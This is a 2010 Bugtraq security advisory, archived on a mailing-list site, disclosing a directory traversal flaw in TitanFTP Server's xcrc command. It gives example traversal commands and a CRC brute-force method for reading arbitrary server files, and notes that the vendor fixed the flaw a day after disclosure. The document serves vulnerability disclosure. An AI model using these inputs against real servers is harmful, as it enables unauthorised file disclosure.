|
|
 |
| New User, Welcome! Login |
TitanFTP Server Arbitrary File Disclosure
| From: |
bill accensussecurity com |
| To: |
bugtraq securityfocus com |
| Cc: |
|
| Subject: |
TitanFTP Server Arbitrary File Disclosure |
| Date: |
Tue - Jun 15, 2010 03:37 PM |
Accensus Security Advisory L-02 TitanFtp Server Arbitrary File Disclosure
Details
=============
Product: TitanFTP Server
Security-Risk: high
Remote-Exploit: maybe, assuming anonymous ftp access
Local-Exploit: yes
Vendor URL: http://www.southrivertech.com/
Found By: Bill Finlayson
http://www.accensussecurity.com
Affected: Versions 8.10.1125 and likely previous
Issue: the xcrc command is susceptible to a directory traversal attack which will allow disclosure of the contents of any file on the server
Details: xcrc ..//..//..//..//a.txt 1 <some huge number> will disclose the file's size
xcrc ..//..//..//..//a.txt 1 2
xcrc ..//..//..//..//a.txt 1 3
...
xcrc ..//..//..//..//a.txt 1 <filesize>
when automated allows for an easy brute force attack on the crc's
Status: Submitted to Vendor 6/14/10 fixed 6/15/10
|
|
|
Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!
